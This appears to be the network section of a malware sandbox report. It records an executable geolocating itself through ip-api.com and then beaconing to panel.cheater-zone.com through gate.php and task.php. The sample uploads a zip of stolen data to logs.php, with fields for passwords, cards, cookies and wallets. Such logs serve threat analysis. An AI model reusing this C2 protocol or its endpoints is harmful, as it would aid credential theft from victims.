                                                                                                                                        Jan 23, 2023 21:27:17.878200054 CET4971980192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:27:18.160805941 CET4971980192.168.2.392.249.45.113
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
--- | --- | --- | --- | --- | --- | --- | --- | ---
Jan 23, 2023 21:24:58.871665001 CET | 192.168.2.3 | 8.8.8.8 | 0x34f7 | Standard query (0) | ip-api.com | A (IP address) | IN (0x0001) | false
Jan 23, 2023 21:25:08.443223953 CET | 192.168.2.3 | 8.8.8.8 | 0xee26 | Standard query (0) | ip-api.com | A (IP address) | IN (0x0001) | false
Jan 23, 2023 21:25:11.535756111 CET | 192.168.2.3 | 8.8.8.8 | 0xf827 | Standard query (0) | ip-api.com | A (IP address) | IN (0x0001) | false
Jan 23, 2023 21:25:22.189124107 CET | 192.168.2.3 | 8.8.8.8 | 0x9edd | Standard query (0) | ip-api.com | A (IP address) | IN (0x0001) | false
Jan 23, 2023 21:25:22.825491905 CET | 192.168.2.3 | 8.8.8.8 | 0x6d87 | Standard query (0) | ip-api.com | A (IP address) | IN (0x0001) | false
Jan 23, 2023 21:25:23.090148926 CET | 192.168.2.3 | 8.8.8.8 | 0x658 | Standard query (0) | panel.cheater-zone.com | A (IP address) | IN (0x0001) | false
Jan 23, 2023 21:25:33.646619081 CET | 192.168.2.3 | 8.8.8.8 | 0xb7be | Standard query (0) | panel.cheater-zone.com | A (IP address) | IN (0x0001) | false
Jan 23, 2023 21:25:34.280523062 CET | 192.168.2.3 | 8.8.8.8 | 0xfffb | Standard query (0) | ip-api.com | A (IP address) | IN (0x0001) | false
Jan 23, 2023 21:25:36.890943050 CET | 192.168.2.3 | 8.8.8.8 | 0xe259 | Standard query (0) | ip-api.com | A (IP address) | IN (0x0001) | false
Jan 23, 2023 21:25:39.142227888 CET | 192.168.2.3 | 8.8.8.8 | 0x76ba | Standard query (0) | panel.cheater-zone.com | A (IP address) | IN (0x0001) | false
Jan 23, 2023 21:25:39.166711092 CET | 192.168.2.3 | 8.8.8.8 | 0xe3ad | Standard query (0) | ip-api.com | A (IP address) | IN (0x0001) | false
Jan 23, 2023 21:25:47.714207888 CET | 192.168.2.3 | 8.8.8.8 | 0x8220 | Standard query (0) | panel.cheater-zone.com | A (IP address) | IN (0x0001) | false
Jan 23, 2023 21:25:52.110774994 CET | 192.168.2.3 | 8.8.8.8 | 0x1186 | Standard query (0) | panel.cheater-zone.com | A (IP address) | IN (0x0001) | false
Jan 23, 2023 21:25:55.984730005 CET | 192.168.2.3 | 8.8.8.8 | 0x3130 | Standard query (0) | ip-api.com | A (IP address) | IN (0x0001) | false
Jan 23, 2023 21:25:59.081839085 CET | 192.168.2.3 | 8.8.8.8 | 0xb2c1 | Standard query (0) | panel.cheater-zone.com | A (IP address) | IN (0x0001) | false
Jan 23, 2023 21:26:02.552184105 CET | 192.168.2.3 | 8.8.8.8 | 0xb2ba | Standard query (0) | panel.cheater-zone.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
--- | --- | --- | --- | --- | --- | --- | --- | --- | --- | ---
Jan 23, 2023 21:24:58.893373966 CET | 8.8.8.8 | 192.168.2.3 | 0x34f7 | No error (0) | ip-api.com | | 208.95.112.1 | A (IP address) | IN (0x0001) | false
Jan 23, 2023 21:25:08.463412046 CET | 8.8.8.8 | 192.168.2.3 | 0xee26 | No error (0) | ip-api.com | | 208.95.112.1 | A (IP address) | IN (0x0001) | false
Jan 23, 2023 21:25:11.553390980 CET | 8.8.8.8 | 192.168.2.3 | 0xf827 | No error (0) | ip-api.com | | 208.95.112.1 | A (IP address) | IN (0x0001) | false
Jan 23, 2023 21:25:22.208219051 CET | 8.8.8.8 | 192.168.2.3 | 0x9edd | No error (0) | ip-api.com | | 208.95.112.1 | A (IP address) | IN (0x0001) | false
Jan 23, 2023 21:25:22.844886065 CET | 8.8.8.8 | 192.168.2.3 | 0x6d87 | No error (0) | ip-api.com | | 208.95.112.1 | A (IP address) | IN (0x0001) | false
Jan 23, 2023 21:25:23.128328085 CET | 8.8.8.8 | 192.168.2.3 | 0x658 | No error (0) | panel.cheater-zone.com | | 92.249.45.113 | A (IP address) | IN (0x0001) | false
Jan 23, 2023 21:25:33.684163094 CET | 8.8.8.8 | 192.168.2.3 | 0xb7be | No error (0) | panel.cheater-zone.com | | 92.249.45.113 | A (IP address) | IN (0x0001) | false
Jan 23, 2023 21:25:34.299850941 CET | 8.8.8.8 | 192.168.2.3 | 0xfffb | No error (0) | ip-api.com | | 208.95.112.1 | A (IP address) | IN (0x0001) | false
Jan 23, 2023 21:25:36.920562029 CET | 8.8.8.8 | 192.168.2.3 | 0xe259 | No error (0) | ip-api.com | | 208.95.112.1 | A (IP address) | IN (0x0001) | false
Jan 23, 2023 21:25:39.178850889 CET | 8.8.8.8 | 192.168.2.3 | 0x76ba | No error (0) | panel.cheater-zone.com | | 92.249.45.113 | A (IP address) | IN (0x0001) | false
Jan 23, 2023 21:25:39.184284925 CET | 8.8.8.8 | 192.168.2.3 | 0xe3ad | No error (0) | ip-api.com | | 208.95.112.1 | A (IP address) | IN (0x0001) | false
Jan 23, 2023 21:25:47.731792927 CET | 8.8.8.8 | 192.168.2.3 | 0x8220 | No error (0) | panel.cheater-zone.com | | 92.249.45.113 | A (IP address) | IN (0x0001) | false
Jan 23, 2023 21:25:52.128407955 CET | 8.8.8.8 | 192.168.2.3 | 0x1186 | No error (0) | panel.cheater-zone.com | | 92.249.45.113 | A (IP address) | IN (0x0001) | false
Jan 23, 2023 21:25:56.016683102 CET | 8.8.8.8 | 192.168.2.3 | 0x3130 | No error (0) | ip-api.com | | 208.95.112.1 | A (IP address) | IN (0x0001) | false
Jan 23, 2023 21:25:59.136511087 CET | 8.8.8.8 | 192.168.2.3 | 0xb2c1 | No error (0) | panel.cheater-zone.com | | 92.249.45.113 | A (IP address) | IN (0x0001) | false
Jan 23, 2023 21:26:02.666835070 CET | 8.8.8.8 | 192.168.2.3 | 0xb2ba | No error (0) | panel.cheater-zone.com | | 92.249.45.113 | A (IP address) | IN (0x0001) | false
                                                                                                                                        • ip-api.com
                                                                                                                                        • panel.cheater-zone.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
--- | --- | --- | --- | --- | ---
0 | 192.168.2.3 | 49702 | 208.95.112.1 | 80 | C:\Users\user\Desktop\5VXh2VBmA0.exe

Jan 23, 2023 21:24:58.945521116 CET (103 kBytes transferred, OUT):
GET /json/ HTTP/1.1
Host: ip-api.com
Connection: Keep-Alive

Jan 23, 2023 21:24:58.979034901 CET (104 kBytes transferred, IN):
HTTP/1.1 200 OK
Date: Mon, 23 Jan 2023 20:24:58 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 293
Access-Control-Allow-Origin: *
X-Ttl: 60
X-Rl: 44
Data Ascii: {"status":"success","country":"Switzerland","countryCode":"CH","region":"ZG","regionName":"Zug","city":"Hunenberg","zip":"6333","lat":47.173,"lon":8.4204,"timezone":"Europe/Zurich","isp":"Datacamp Limited","org":"DET Africa (Pty) LTD","as":"AS212238 Datacamp Limited","query":"102.129.143.10"}


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
--- | --- | --- | --- | --- | ---
1 | 192.168.2.3 | 49703 | 208.95.112.1 | 80 | C:\Users\user\Desktop\5VXh2VBmA0.exe

Jan 23, 2023 21:25:08.497775078 CET (104 kBytes transferred, OUT):
GET /json/ HTTP/1.1
Host: ip-api.com

Jan 23, 2023 21:25:08.532289028 CET (105 kBytes transferred, IN):
HTTP/1.1 200 OK
Date: Mon, 23 Jan 2023 20:25:08 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 293
Access-Control-Allow-Origin: *
X-Ttl: 50
X-Rl: 43
Data Ascii: {"status":"success","country":"Switzerland","countryCode":"CH","region":"ZG","regionName":"Zug","city":"Hunenberg","zip":"6333","lat":47.173,"lon":8.4204,"timezone":"Europe/Zurich","isp":"Datacamp Limited","org":"DET Africa (Pty) LTD","as":"AS212238 Datacamp Limited","query":"102.129.143.10"}


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
--- | --- | --- | --- | --- | ---
10 | 192.168.2.3 | 49713 | 208.95.112.1 | 80 | C:\Users\user\Desktop\5VXh2VBmA0.exe

Jan 23, 2023 21:25:39.225068092 CET (116 kBytes transferred, OUT):
GET /json/ HTTP/1.1
Host: ip-api.com
Connection: Keep-Alive

Jan 23, 2023 21:25:39.255388975 CET (117 kBytes transferred, IN):
HTTP/1.1 200 OK
Date: Mon, 23 Jan 2023 20:25:38 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 293
Access-Control-Allow-Origin: *
X-Ttl: 60
X-Rl: 44
Data Ascii: {"status":"success","country":"Switzerland","countryCode":"CH","region":"ZG","regionName":"Zug","city":"Hunenberg","zip":"6333","lat":47.173,"lon":8.4204,"timezone":"Europe/Zurich","isp":"Datacamp Limited","org":"DET Africa (Pty) LTD","as":"AS212238 Datacamp Limited","query":"102.129.143.10"}


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
11 | 192.168.2.3 | 49712 | 92.249.45.113 | 80 | C:\Users\user\Desktop\5VXh2VBmA0.exe
Timestamp | kBytes transferred | Direction | Data
Jan 23, 2023 21:25:39.311254978 CET | 117 | OUT | GET /gate.php?hwid=CH65FCCAB88D HTTP/1.1
  Host: panel.cheater-zone.com
Jan 23, 2023 21:25:39.451045036 CET | 118 | IN | HTTP/1.1 200 OK
  Connection: Keep-Alive
  Keep-Alive: timeout=5, max=100
  x-powered-by: PHP/8.0.25
  content-type: text/html; charset=UTF-8
  content-length: 3
  date: Mon, 23 Jan 2023 20:25:39 GMT
  server: LiteSpeed
  strict-transport-security: max-age=31536000; includeSubDomains; preload
  x-xss-protection: 1; mode=block
  x-content-type-options: nosniff
  Data Raw: ef bb bf
  Data Ascii:
Jan 23, 2023 21:25:42.490222931 CET | 118 | OUT | GET /task.php?hwid=CH65FCCAB88D HTTP/1.1
  Host: panel.cheater-zone.com
Jan 23, 2023 21:25:42.659754992 CET | 118 | IN | HTTP/1.1 200 OK
  Connection: Keep-Alive
  Keep-Alive: timeout=5, max=100
  x-powered-by: PHP/8.0.25
  content-type: text/html; charset=UTF-8
  content-length: 3
  date: Mon, 23 Jan 2023 20:25:42 GMT
  server: LiteSpeed
  strict-transport-security: max-age=31536000; includeSubDomains; preload
  x-xss-protection: 1; mode=block
  x-content-type-options: nosniff
  Data Raw: ef bb bf
  Data Ascii:


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
12 | 192.168.2.3 | 49715 | 92.249.45.113 | 80 | C:\Users\user\Desktop\5VXh2VBmA0.exe
Timestamp | kBytes transferred | Direction | Data
Jan 23, 2023 21:25:47.864337921 CET | 136 | OUT | GET /gate.php?hwid=CH65FCCAB88D HTTP/1.1
  Host: panel.cheater-zone.com
  Connection: Keep-Alive
Jan 23, 2023 21:25:47.998567104 CET | 136 | IN | HTTP/1.1 200 OK
  Connection: Keep-Alive
  Keep-Alive: timeout=5, max=100
  x-powered-by: PHP/8.0.25
  content-type: text/html; charset=UTF-8
  content-length: 3
  date: Mon, 23 Jan 2023 20:25:47 GMT
  server: LiteSpeed
  strict-transport-security: max-age=31536000; includeSubDomains; preload
  x-xss-protection: 1; mode=block
  x-content-type-options: nosniff
  Data Raw: ef bb bf
  Data Ascii:


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
13 | 192.168.2.3 | 49716 | 92.249.45.113 | 80 | C:\Users\user\Desktop\5VXh2VBmA0.exe
Timestamp | kBytes transferred | Direction | Data
Jan 23, 2023 21:25:52.268623114 CET | 137 | OUT | GET /task.php?hwid=CH65FCCAB88D HTTP/1.1
  Host: panel.cheater-zone.com
Jan 23, 2023 21:25:52.495882034 CET | 138 | IN | HTTP/1.1 200 OK
  Connection: Keep-Alive
  Keep-Alive: timeout=5, max=100
  x-powered-by: PHP/8.0.25
  content-type: text/html; charset=UTF-8
  content-length: 3
  date: Mon, 23 Jan 2023 20:25:52 GMT
  server: LiteSpeed
  strict-transport-security: max-age=31536000; includeSubDomains; preload
  x-xss-protection: 1; mode=block
  x-content-type-options: nosniff
  Data Raw: ef bb bf
  Data Ascii:
Jan 23, 2023 21:25:52.511815071 CET | 138 | OUT | POST /logs.php?hwid=CH65FCCAB88D&Passwords=0&CreditCards=0&Cookies=0&AutoFill=0&Wallets=0 HTTP/1.1
  Content-Type: multipart/form-data; boundary=---------------------8dafd8eef66f49d
  Host: panel.cheater-zone.com
  Content-Length: 791547
  Expect: 100-continue
Jan 23, 2023 21:25:52.642586946 CET | 138 | IN | HTTP/1.1 100 Continue
Jan 23, 2023 21:25:52.644560099 CET | 138 | OUT | Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 66 64 38 65 65 66 36 36 66 34 39 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65
  Data Ascii: -----------------------8dafd8eef66f49dContent-Disposition: form-data; name="file"; filename="CH_65FCCAB88D.zip"Content-Type: application/octet-stream
Jan 23, 2023 21:25:52.644714117 CET | 146 | OUT | Data Raw: 50 4b 03 04 14 00 00 00 00 00 28 ab 37 56 00 00 00 00 00 00 00 00 00 00 00 00 09 00 00 00 43 61 72 64 73 2e 74 78 74 50 4b 03 04 14 00 00 00 00 00 4f ac 37 56 00 00 00 00 00 00 00 00 00 00 00 00 06 00 00 00 46 69 6c 65 73 5c 50 4b 03 04 14 00 00
  Data Ascii: PK(7VCards.txtPKO7VFiles\PK)7Vll,Linfo.txtN0EwK;&i:0Dp4_:{zuKLv.SO'<>PQ;icf'/kpCGiPDswG$
Jan 23, 2023 21:25:54.040550947 CET | 922 | IN | HTTP/1.1 200 OK
  Connection: Keep-Alive
  Keep-Alive: timeout=5, max=100
  x-powered-by: PHP/8.0.25
  content-type: text/html; charset=UTF-8
  content-length: 3
  date: Mon, 23 Jan 2023 20:25:53 GMT
  server: LiteSpeed
  strict-transport-security: max-age=31536000; includeSubDomains; preload
  x-xss-protection: 1; mode=block
  x-content-type-options: nosniff
  Data Raw: ef bb bf
  Data Ascii:


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
14 | 192.168.2.3 | 49717 | 208.95.112.1 | 80 | C:\Users\user\Desktop\5VXh2VBmA0.exe
Timestamp | kBytes transferred | Direction | Data
Jan 23, 2023 21:25:56.050263882 CET | 923 | OUT | GET /json/ HTTP/1.1
  Host: ip-api.com
  Connection: Keep-Alive
Jan 23, 2023 21:25:56.080812931 CET | 923 | IN | HTTP/1.1 200 OK
  Date: Mon, 23 Jan 2023 20:25:55 GMT
  Content-Type: application/json; charset=utf-8
  Content-Length: 293
  Access-Control-Allow-Origin: *
  X-Ttl: 43
  X-Rl: 43
  Data Raw: 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 53 77 69 74 7a 65 72 6c 61 6e 64 22 2c 22 63 6f 75 6e 74 72 79 43 6f 64 65 22 3a 22 43 48 22 2c 22 72 65 67 69 6f 6e 22 3a 22 5a 47 22 2c 22 72 65 67 69 6f 6e 4e 61 6d 65 22 3a 22 5a 75 67 22 2c 22 63 69 74 79 22 3a 22 48 75 6e 65 6e 62 65 72 67 22 2c 22 7a 69 70 22 3a 22 36 33 33 33 22 2c 22 6c 61 74 22 3a 34 37 2e 31 37 33 2c 22 6c 6f 6e 22 3a 38 2e 34 32 30 34 2c 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 45 75 72 6f 70 65 2f 5a 75 72 69 63 68 22 2c 22 69 73 70 22 3a 22 44 61 74 61 63 61 6d 70 20 4c 69 6d 69 74 65 64 22 2c 22 6f 72 67 22 3a 22 44 45 54 20 41 66 72 69 63 61 20 28 50 74 79 29 20 4c 54 44 22 2c 22 61 73 22 3a 22 41 53 32 31 32 32 33 38 20 44 61 74 61 63 61 6d 70 20 4c 69 6d 69 74 65 64 22 2c 22 71 75 65 72 79 22 3a 22 31 30 32 2e 31 32 39 2e 31 34 33 2e 31 30 22 7d
  Data Ascii: {"status":"success","country":"Switzerland","countryCode":"CH","region":"ZG","regionName":"Zug","city":"Hunenberg","zip":"6333","lat":47.173,"lon":8.4204,"timezone":"Europe/Zurich","isp":"Datacamp Limited","org":"DET Africa (Pty) LTD","as":"AS212238 Datacamp Limited","query":"102.129.143.10"}


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
15 | 192.168.2.3 | 49718 | 92.249.45.113 | 80 | C:\Users\user\Desktop\5VXh2VBmA0.exe
Timestamp | kBytes transferred | Direction | Data
Jan 23, 2023 21:25:59.271301031 CET | 924 | OUT | GET /gate.php?hwid=CH65FCCAB88D HTTP/1.1
  Host: panel.cheater-zone.com
Jan 23, 2023 21:25:59.408112049 CET | 924 | IN | HTTP/1.1 200 OK
  Connection: Keep-Alive
  Keep-Alive: timeout=5, max=100
  x-powered-by: PHP/8.0.25
  content-type: text/html; charset=UTF-8
  content-length: 3
  date: Mon, 23 Jan 2023 20:25:59 GMT
  server: LiteSpeed
  strict-transport-security: max-age=31536000; includeSubDomains; preload
  x-xss-protection: 1; mode=block
  x-content-type-options: nosniff
  Data Raw: ef bb bf
  Data Ascii:


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
16 | 192.168.2.3 | 49719 | 92.249.45.113 | 80 | C:\Users\user\Desktop\5VXh2VBmA0.exe
Timestamp | kBytes transferred | Direction | Data
Jan 23, 2023 21:26:02.805896997 CET | 925 | OUT | GET /task.php?hwid=CH65FCCAB88D HTTP/1.1
  Host: panel.cheater-zone.com
  Connection: Keep-Alive
Jan 23, 2023 21:26:02.986946106 CET | 926 | IN | HTTP/1.1 200 OK
  Connection: Keep-Alive
  Keep-Alive: timeout=5, max=100
  x-powered-by: PHP/8.0.25
  content-type: text/html; charset=UTF-8
  content-length: 3
  date: Mon, 23 Jan 2023 20:26:02 GMT
  server: LiteSpeed
  strict-transport-security: max-age=31536000; includeSubDomains; preload
  x-xss-protection: 1; mode=block
  x-content-type-options: nosniff
  Data Raw: ef bb bf
  Data Ascii:
Jan 23, 2023 21:26:03.101003885 CET | 926 | OUT | GET /task.php?hwid=CH65FCCAB88D HTTP/1.1
  Host: panel.cheater-zone.com
Jan 23, 2023 21:26:03.266861916 CET | 926 | IN | HTTP/1.1 200 OK
  Connection: Keep-Alive
  Keep-Alive: timeout=5, max=100
  x-powered-by: PHP/8.0.25
  content-type: text/html; charset=UTF-8
  content-length: 3
  date: Mon, 23 Jan 2023 20:26:03 GMT
  server: LiteSpeed
  strict-transport-security: max-age=31536000; includeSubDomains; preload
  x-xss-protection: 1; mode=block
  x-content-type-options: nosniff
  Data Raw: ef bb bf
  Data Ascii:
Jan 23, 2023 21:26:03.381027937 CET | 926 | OUT | GET /task.php?hwid=CH65FCCAB88D HTTP/1.1
  Host: panel.cheater-zone.com
Jan 23, 2023 21:26:03.612912893 CET | 927 | IN | HTTP/1.1 200 OK
  Connection: Keep-Alive
                                                                                                                                        Keep-Alive: timeout=5, max=100
                                                                                                                                        x-powered-by: PHP/8.0.25
                                                                                                                                        content-type: text/html; charset=UTF-8
                                                                                                                                        content-length: 3
                                                                                                                                        date: Mon, 23 Jan 2023 20:26:03 GMT
                                                                                                                                        server: LiteSpeed
                                                                                                                                        strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                                                        x-xss-protection: 1; mode=block
                                                                                                                                        x-content-type-options: nosniff
                                                                                                                                        Data Raw: ef bb bf
                                                                                                                                        Data Ascii:
                                                                                                                                        Jan 23, 2023 21:26:03.725219011 CET927OUTGET /task.php?hwid=CH65FCCAB88D HTTP/1.1
                                                                                                                                        Host: panel.cheater-zone.com
                                                                                                                                        Jan 23, 2023 21:26:03.948374987 CET928INHTTP/1.1 200 OK
                                                                                                                                        Connection: Keep-Alive
                                                                                                                                        Keep-Alive: timeout=5, max=100
                                                                                                                                        x-powered-by: PHP/8.0.25
                                                                                                                                        content-type: text/html; charset=UTF-8
                                                                                                                                        content-length: 3
                                                                                                                                        date: Mon, 23 Jan 2023 20:26:03 GMT
                                                                                                                                        server: LiteSpeed
                                                                                                                                        strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                                                        x-xss-protection: 1; mode=block
                                                                                                                                        x-content-type-options: nosniff
                                                                                                                                        Data Raw: ef bb bf
                                                                                                                                        Data Ascii:
                                                                                                                                        Jan 23, 2023 21:26:04.057018042 CET928OUTGET /task.php?hwid=CH65FCCAB88D HTTP/1.1
                                                                                                                                        Host: panel.cheater-zone.com
                                                                                                                                        Jan 23, 2023 21:26:04.291939974 CET928INHTTP/1.1 200 OK
                                                                                                                                        Connection: Keep-Alive
                                                                                                                                        Keep-Alive: timeout=5, max=100
                                                                                                                                        x-powered-by: PHP/8.0.25
                                                                                                                                        content-type: text/html; charset=UTF-8
                                                                                                                                        content-length: 3
                                                                                                                                        date: Mon, 23 Jan 2023 20:26:04 GMT
                                                                                                                                        server: LiteSpeed
                                                                                                                                        strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                                                        x-xss-protection: 1; mode=block
                                                                                                                                        x-content-type-options: nosniff
                                                                                                                                        Data Raw: ef bb bf
                                                                                                                                        Data Ascii:
                                                                                                                                        Jan 23, 2023 21:26:04.396956921 CET928OUTGET /task.php?hwid=CH65FCCAB88D HTTP/1.1
                                                                                                                                        Host: panel.cheater-zone.com
                                                                                                                                        Jan 23, 2023 21:26:04.575546980 CET929INHTTP/1.1 200 OK
                                                                                                                                        Connection: Keep-Alive
                                                                                                                                        Keep-Alive: timeout=5, max=100
                                                                                                                                        x-powered-by: PHP/8.0.25
                                                                                                                                        content-type: text/html; charset=UTF-8
                                                                                                                                        content-length: 3
                                                                                                                                        date: Mon, 23 Jan 2023 20:26:04 GMT
                                                                                                                                        server: LiteSpeed
                                                                                                                                        strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                                                        x-xss-protection: 1; mode=block
                                                                                                                                        x-content-type-options: nosniff
                                                                                                                                        Data Raw: ef bb bf
                                                                                                                                        Data Ascii:
                                                                                                                                        Jan 23, 2023 21:26:04.678045034 CET929OUTGET /task.php?hwid=CH65FCCAB88D HTTP/1.1
                                                                                                                                        Host: panel.cheater-zone.com
                                                                                                                                        Jan 23, 2023 21:26:04.855988979 CET929INHTTP/1.1 200 OK
                                                                                                                                        Connection: Keep-Alive
                                                                                                                                        Keep-Alive: timeout=5, max=100
                                                                                                                                        x-powered-by: PHP/8.0.25
                                                                                                                                        content-type: text/html; charset=UTF-8
                                                                                                                                        content-length: 3
                                                                                                                                        date: Mon, 23 Jan 2023 20:26:04 GMT
                                                                                                                                        server: LiteSpeed
                                                                                                                                        strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                                                        x-xss-protection: 1; mode=block
                                                                                                                                        x-content-type-options: nosniff
                                                                                                                                        Data Raw: ef bb bf
                                                                                                                                        Data Ascii:
                                                                                                                                        Jan 23, 2023 21:26:04.959621906 CET930OUTGET /task.php?hwid=CH65FCCAB88D HTTP/1.1
                                                                                                                                        Host: panel.cheater-zone.com
                                                                                                                                        Jan 23, 2023 21:26:05.140971899 CET930INHTTP/1.1 200 OK
                                                                                                                                        Connection: Keep-Alive
                                                                                                                                        Keep-Alive: timeout=5, max=100
                                                                                                                                        x-powered-by: PHP/8.0.25
                                                                                                                                        content-type: text/html; charset=UTF-8
                                                                                                                                        content-length: 3
                                                                                                                                        date: Mon, 23 Jan 2023 20:26:05 GMT
                                                                                                                                        server: LiteSpeed
                                                                                                                                        strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                                                        x-xss-protection: 1; mode=block
                                                                                                                                        x-content-type-options: nosniff
                                                                                                                                        Data Raw: ef bb bf
                                                                                                                                        Data Ascii:
                                                                                                                                        Jan 23, 2023 21:26:05.256362915 CET930OUTGET /task.php?hwid=CH65FCCAB88D HTTP/1.1
                                                                                                                                        Host: panel.cheater-zone.com
                                                                                                                                        Jan 23, 2023 21:26:05.430114985 CET931INHTTP/1.1 200 OK
                                                                                                                                        Connection: Keep-Alive
                                                                                                                                        Keep-Alive: timeout=5, max=100
                                                                                                                                        x-powered-by: PHP/8.0.25
                                                                                                                                        content-type: text/html; charset=UTF-8
                                                                                                                                        content-length: 3
                                                                                                                                        date: Mon, 23 Jan 2023 20:26:05 GMT
                                                                                                                                        server: LiteSpeed
                                                                                                                                        strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                                                        x-xss-protection: 1; mode=block
                                                                                                                                        x-content-type-options: nosniff
                                                                                                                                        Data Raw: ef bb bf
                                                                                                                                        Data Ascii:
                                                                                                                                        Jan 23, 2023 21:26:05.537333012 CET931OUTGET /task.php?hwid=CH65FCCAB88D HTTP/1.1
                                                                                                                                        Host: panel.cheater-zone.com
                                                                                                                                        Jan 23, 2023 21:26:05.709048033 CET931INHTTP/1.1 200 OK
                                                                                                                                        Connection: Keep-Alive
                                                                                                                                        Keep-Alive: timeout=5, max=100
                                                                                                                                        x-powered-by: PHP/8.0.25
                                                                                                                                        content-type: text/html; charset=UTF-8
                                                                                                                                        content-length: 3
                                                                                                                                        date: Mon, 23 Jan 2023 20:26:05 GMT
                                                                                                                                        server: LiteSpeed
                                                                                                                                        strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                                                        x-xss-protection: 1; mode=block
                                                                                                                                        x-content-type-options: nosniff
                                                                                                                                        Data Raw: ef bb bf
                                                                                                                                        Data Ascii:
                                                                                                                                        Jan 23, 2023 21:26:05.818567991 CET931OUTGET /task.php?hwid=CH65FCCAB88D HTTP/1.1
                                                                                                                                        Host: panel.cheater-zone.com
                                                                                                                                        Jan 23, 2023 21:26:05.990093946 CET932INHTTP/1.1 200 OK
                                                                                                                                        Connection: Keep-Alive
                                                                                                                                        Keep-Alive: timeout=5, max=100
                                                                                                                                        x-powered-by: PHP/8.0.25
                                                                                                                                        content-type: text/html; charset=UTF-8
                                                                                                                                        content-length: 3
                                                                                                                                        date: Mon, 23 Jan 2023 20:26:05 GMT
                                                                                                                                        server: LiteSpeed
                                                                                                                                        strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                                                        x-xss-protection: 1; mode=block
                                                                                                                                        x-content-type-options: nosniff
                                                                                                                                        Data Raw: ef bb bf
                                                                                                                                        Data Ascii:
                                                                                                                                        Jan 23, 2023 21:26:06.100217104 CET932OUTGET /task.php?hwid=CH65FCCAB88D HTTP/1.1
                                                                                                                                        Host: panel.cheater-zone.com
                                                                                                                                        Jan 23, 2023 21:26:06.271626949 CET933INHTTP/1.1 200 OK
                                                                                                                                        Connection: Keep-Alive
                                                                                                                                        Keep-Alive: timeout=5, max=100
                                                                                                                                        x-powered-by: PHP/8.0.25
                                                                                                                                        content-type: text/html; charset=UTF-8
                                                                                                                                        content-length: 3
                                                                                                                                        date: Mon, 23 Jan 2023 20:26:06 GMT
                                                                                                                                        server: LiteSpeed
                                                                                                                                        strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                                                        x-xss-protection: 1; mode=block
                                                                                                                                        x-content-type-options: nosniff
                                                                                                                                        Data Raw: ef bb bf
                                                                                                                                        Data Ascii:
                                                                                                                                        Jan 23, 2023 21:26:06.381253004 CET933OUTGET /task.php?hwid=CH65FCCAB88D HTTP/1.1
                                                                                                                                        Host: panel.cheater-zone.com
                                                                                                                                        Jan 23, 2023 21:26:06.606432915 CET933INHTTP/1.1 200 OK
                                                                                                                                        Connection: Keep-Alive
                                                                                                                                        Keep-Alive: timeout=5, max=100
                                                                                                                                        x-powered-by: PHP/8.0.25
                                                                                                                                        content-type: text/html; charset=UTF-8
                                                                                                                                        content-length: 3
                                                                                                                                        date: Mon, 23 Jan 2023 20:26:06 GMT
                                                                                                                                        server: LiteSpeed
                                                                                                                                        strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                                                        x-xss-protection: 1; mode=block
                                                                                                                                        x-content-type-options: nosniff
                                                                                                                                        Data Raw: ef bb bf
                                                                                                                                        Data Ascii:
                                                                                                                                        Jan 23, 2023 21:26:06.725090027 CET933OUTGET /task.php?hwid=CH65FCCAB88D HTTP/1.1
                                                                                                                                        Host: panel.cheater-zone.com
Jan 23, 2023 21:26:06.893277884 CET  934  IN   HTTP/1.1 200 OK
    Connection: Keep-Alive
    Keep-Alive: timeout=5, max=100
    x-powered-by: PHP/8.0.25
    content-type: text/html; charset=UTF-8
    content-length: 3
    date: Mon, 23 Jan 2023 20:26:06 GMT
    server: LiteSpeed
    strict-transport-security: max-age=31536000; includeSubDomains; preload
    x-xss-protection: 1; mode=block
    x-content-type-options: nosniff
    Data Raw: ef bb bf
    Data Ascii:
Jan 23, 2023 21:26:07.007277966 CET  934  OUT  GET /task.php?hwid=CH65FCCAB88D HTTP/1.1
    Host: panel.cheater-zone.com
Jan 23, 2023 21:26:07.179003000 CET  934  IN   HTTP/1.1 200 OK
    Connection: Keep-Alive
    Keep-Alive: timeout=5, max=100
    x-powered-by: PHP/8.0.25
    content-type: text/html; charset=UTF-8
    content-length: 3
    date: Mon, 23 Jan 2023 20:26:07 GMT
    server: LiteSpeed
    strict-transport-security: max-age=31536000; includeSubDomains; preload
    x-xss-protection: 1; mode=block
    x-content-type-options: nosniff
    Data Raw: ef bb bf
    Data Ascii:
Jan 23, 2023 21:26:07.288518906 CET  935  OUT  GET /task.php?hwid=CH65FCCAB88D HTTP/1.1
